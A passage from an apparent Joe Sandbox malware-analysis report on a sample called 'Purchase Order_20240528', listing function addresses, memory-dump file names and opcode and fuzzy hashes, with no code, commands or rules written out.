                                  • Instruction Fuzzy Hash: 6F01B532100705DFEB3296ADCC40AAB77EEFFC5254F44881DA6468B680DA70E442C750
                                  Function 016220F0 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a94c81667d4361a25ddc511df45892775c15ba35d7e382ef536b23224d72d2ea
                                  • Instruction ID: 6504a54127e5b7e3c13910f009d69d66521f60df7fa77442dfe69975235cf23c
                                  • Opcode Fuzzy Hash: a94c81667d4361a25ddc511df45892775c15ba35d7e382ef536b23224d72d2ea
                                  • Instruction Fuzzy Hash: 72116935A0165DAFDB15EFA8CC54FAE7BBAFB44384F10405DEA019B290DA35AE11CF90
                                  Function 0161E5CF Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a72c7a63e5386ce46bc66fb6cad44ad876c8e43815180c513347d947dae2cef
                                  • Instruction ID: ae65122a2f81f749d4d3c05fef15bc7053e8086193c5205c2f9046cd9b8b0230
                                  • Opcode Fuzzy Hash: 9a72c7a63e5386ce46bc66fb6cad44ad876c8e43815180c513347d947dae2cef
                                  • Instruction Fuzzy Hash: D601F7B1610903BFD311AB3ACD44E13B7ACFF95794B01062DF6058B651DB24EC01C6E0
                                  Function 016769C0 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 116cd584e3fee1b6777bf95cf5606daa9de3c3e5e10b67c7b8d8770c42e023fb
                                  • Instruction ID: 0718709696142948aa3b8436c420ccb79e4041698c18de63bf3be4fda67b6dda
                                  • Opcode Fuzzy Hash: 116cd584e3fee1b6777bf95cf5606daa9de3c3e5e10b67c7b8d8770c42e023fb
                                  • Instruction Fuzzy Hash: C201D832614A129FD324EF6EDC489A6BBA8FB98660F114129ED5987280E7309915CBD1
                                  Function 0166C460 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 269a499603706e7bdd0e7679201f0e9cffecda117a1d7811a05dccdee85cb1ce
                                  • Instruction ID: d086cc4a24f8455b7ef8baeb9c91a2ea70b5b001d5ae7ceeafbc25bae03e8eab
                                  • Opcode Fuzzy Hash: 269a499603706e7bdd0e7679201f0e9cffecda117a1d7811a05dccdee85cb1ce
                                  • Instruction Fuzzy Hash: 77111775A01609EBDB15EFA8CC44EAE7BBAFB98350F004099F94197390DA35EA11DB90
                                  Function 0166C97C Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dfb0b472f7cf6dfcbb37ba408b109df81d38ed56ad57a990efd9ecb9c6339eca
                                  • Instruction ID: c61da6f724ab5487f60e7539974d7b2ada26cbfc067f1b20f28da194bf69692f
                                  • Opcode Fuzzy Hash: dfb0b472f7cf6dfcbb37ba408b109df81d38ed56ad57a990efd9ecb9c6339eca
                                  • Instruction Fuzzy Hash: 33117C71A047459FC700DF69C84195BBBE8FF98310F00451EF998D7390D630E900CB96
                                  Function 0166CA11 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 612acf2589be0703c585d9e781ff049d8db6e81fd7291666d2d0eb68080e71a9
                                  • Instruction ID: df586978cf9e8fd8744d52d08a99b57d3f905219c08064355923cd163deb1365
                                  • Opcode Fuzzy Hash: 612acf2589be0703c585d9e781ff049d8db6e81fd7291666d2d0eb68080e71a9
                                  • Instruction Fuzzy Hash: DC117C71A047059FC300DF69C84194BBBE8FF99350F00451EF998D7394E630E900CBA6
                                  Function 015FE016 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                  • Instruction ID: 5971a1ab6ce26683f02b4ab96d66714bba49f42476c2e8e77c0ca16f5bf87545
                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                  • Instruction Fuzzy Hash: E20178722006809FE322861DC948F2A7BEDFB84794F0A04A9FA05CF6A1D778DC40CA25
                                  Function 015D826B Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31b7eb6f686a17a5520f1af912d4fdb74d3f8792a9edfe3e467e4b0ab5f4d9c5
                                  • Instruction ID: ed85e7018ab030286d1acf9fcf4597bd43b8db5c03795a52bdc68e7dbc734513
                                  • Opcode Fuzzy Hash: 31b7eb6f686a17a5520f1af912d4fdb74d3f8792a9edfe3e467e4b0ab5f4d9c5
                                  • Instruction Fuzzy Hash: 2101D431B00505DFC724EB6DDC409AE77E9FF81220B0A4469D902AB244EE20D801C791
                                  Function 0168EB50 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9561699e28e889af99fb31d49513e36f67adcc413405f8ccb20f92330600f764
                                  • Instruction ID: 6855adf4142371d5676fd903ecaa376d186ac7e6e28e595b91285d3244822dc3
                                  • Opcode Fuzzy Hash: 9561699e28e889af99fb31d49513e36f67adcc413405f8ccb20f92330600f764
                                  • Instruction Fuzzy Hash: 8D018FB1781A02AFD3316F19DD40F16BAA8AF55B50F01482EE70A9F390D7B1D8418B58
                                  Function 015E2582 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 042fb0a78a7bc2eea4894877804b96743dbb695f8cb02aed811b6f81c1d1a3f1
                                  • Instruction ID: 18b2bbdce9705c3c5da575c58bc8048e363f8e9207ce0d8d007297b525a18f57
                                  • Opcode Fuzzy Hash: 042fb0a78a7bc2eea4894877804b96743dbb695f8cb02aed811b6f81c1d1a3f1
                                  • Instruction Fuzzy Hash: 63F0F472A41B11BBC7359B5A8D44F07BEEDFFC4B90F114429A6069F600DA30ED01CAA0
                                  Function 0160C073 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                  • Instruction ID: 52652bfc0451995940c8034a74cfe3e98744d02531d7baacf626fa2aa8f7b1ea
                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                  • Instruction Fuzzy Hash: C9F0C8B2600615ABD325CF4DDC40E57FBEADBD1A80F04856CE615C7320E631DD04CB50
                                  Function 016B634F Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c76613a3edd0d851333a3403a86ddeadecadeda9b5fc5618fe56bd77486eba1
                                  • Instruction ID: e84bddd106df27c706df98018733c837d264904d58804d907b6306b4d2b6d67a
                                  • Opcode Fuzzy Hash: 3c76613a3edd0d851333a3403a86ddeadecadeda9b5fc5618fe56bd77486eba1
                                  • Instruction Fuzzy Hash: F8012171E11619EBDB04DFA9D951A9EB7F8FF58304F10406AE904EB350D7749A01CBA4
                                  Function 015DC310 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                  • Instruction ID: 433d78508368a85ff878a9017010a77f9ae198dcaeaf940085dca3491b270968
                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                  • Instruction Fuzzy Hash: 19F02B73258A339BD7325A9D8840B6FAAD5FFD1A64F1A007DF2099F244CE648D02E7D0
                                  Function 016B625D Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5643d78a9edf4cfcfa5c038a40d2f6a39e85c601527b28e8c43b735ac9e396a4
                                  • Instruction ID: 6eb9dc77c9fa8c970cdde38b7608403f7ef971326eb963b408bb7e9ae0169dcc
                                  • Opcode Fuzzy Hash: 5643d78a9edf4cfcfa5c038a40d2f6a39e85c601527b28e8c43b735ac9e396a4
                                  • Instruction Fuzzy Hash: E2012171E1061AEBDB04DFA9D851AAEB7F8FF58344F10805AF904EB351D6749901CBA4
                                  Function 016B62D6 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa4cba7b0e4c03fdd31d0a426ae72dc8d6c85c92974249419641edf8afbd9633
                                  • Instruction ID: 59ac34dcca99d6b7188cea4a307ec46086d97d09539b3bc68e78c74199e16248
                                  • Opcode Fuzzy Hash: aa4cba7b0e4c03fdd31d0a426ae72dc8d6c85c92974249419641edf8afbd9633
                                  • Instruction Fuzzy Hash: 9C012171E01219EBDB04DFA9D841A9EBBF8FF58304F50405AE914EB390D674D901CBA4
                                  Function 0161CA6F Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                  • Instruction ID: 3e8a209863417396007c268404d50e3b97897da3518b7e7461075124d52acb2b
                                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                  • Instruction Fuzzy Hash: 8901AD322416859BE323971ECD05B59BF9CEF81750F0C40A9FE448BBA1D769C801C210
                                  Function 016B61E5 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3444468dd6ee99be8731ca7a17349c5840d222d558af2473d515df0e584ca73
                                  • Instruction ID: 9d2fcdc528d9b4bb7b4a62e53a3dd6f581887379ddab1e3533f08e619d0d2144
                                  • Opcode Fuzzy Hash: a3444468dd6ee99be8731ca7a17349c5840d222d558af2473d515df0e584ca73
                                  • Instruction Fuzzy Hash: CF012C71E016599FDB14DFA9D845AEEBBB8BF58310F14405AE501AB380DB74EA01CBA8
                                  Function 016663C0 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction ID: d154a68f313ad2c36cd26cebc280fece81c8607a407a5079b3d65ac8603a9955
                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction Fuzzy Hash: 7CF01D7220001EBFEF029F95DD80DAF7B7EFF59298B114129FA1196160D631DE21EBA0
                                  Function 015DC0F0 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fde7fe346c96c5bc597d1255b1045cab55ea1c969dd2aea00b40624114679d65
                                  • Instruction ID: df5bafb922c84c6002b25c416a1c79172ee3310c4c6c48482eef1ae76c383607
                                  • Opcode Fuzzy Hash: fde7fe346c96c5bc597d1255b1045cab55ea1c969dd2aea00b40624114679d65
                                  • Instruction Fuzzy Hash: 2BF024716042626BF73496AD8C42B6232DAFBC4650F25842EEB098F2C1E970DC01C3A4
                                  Function 0161656A Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8805837cf79eda02a782f93cef8dde54b64263e70fca0e75c4bfe625bdb344b0
                                  • Instruction ID: d6d9fa4fd39f4b76387d9d525664f6282db416e92575c3aedcab7d24b6ca096d
                                  • Opcode Fuzzy Hash: 8805837cf79eda02a782f93cef8dde54b64263e70fca0e75c4bfe625bdb344b0
                                  • Instruction Fuzzy Hash: 610144756016819BF362976DCD48B2537A8BB40B44F484194FA01CBBEAEB68D442C624
                                  Function 0168437C Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction ID: 4bc1bf1b61b57e5102c9b00a0dc97bc9deb4491835b09eeea585abbf45c6a86b
                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction Fuzzy Hash: 4AF08235341E2357EB76BA2F9C20B2EBA96AFA0A50B09072C9655DB780DF60D8018790
                                  Function 0166E872 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction ID: 691c3101c5f56691baf2cecd1d1347b99a6f2afdbb983fde94d7b64351545271
                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction Fuzzy Hash: A8F05E36B516129BE721DA4ECC80F16B7ACBFD5A60F1B016DA6049B360C762EC02C7D0
                                  Function 0166C89D Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04b336c98e17038807aefc88783eca45748ea62113543f002deb91b7483f362f
                                  • Instruction ID: dcefc2921ac8cd40eb8621733c45d975c2d73796d37b706d2f9e06642766ddee
                                  • Opcode Fuzzy Hash: 04b336c98e17038807aefc88783eca45748ea62113543f002deb91b7483f362f
                                  • Instruction Fuzzy Hash: CBF0AF70A057449FC320EF28C841A1ABBE4FF98710F40465EB898DB394EA34E901CB96
                                  Function 01610854 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction ID: db811055465241bf195ddb465667561ccb497b6ba8f32c69e201518c0181423b
                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction Fuzzy Hash: F1F0F072610201EEEB24DF25CC00F46B6E9EF98344F2980A8AA44CB2B4FAB0DD41C654
                                  Function 0166C912 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
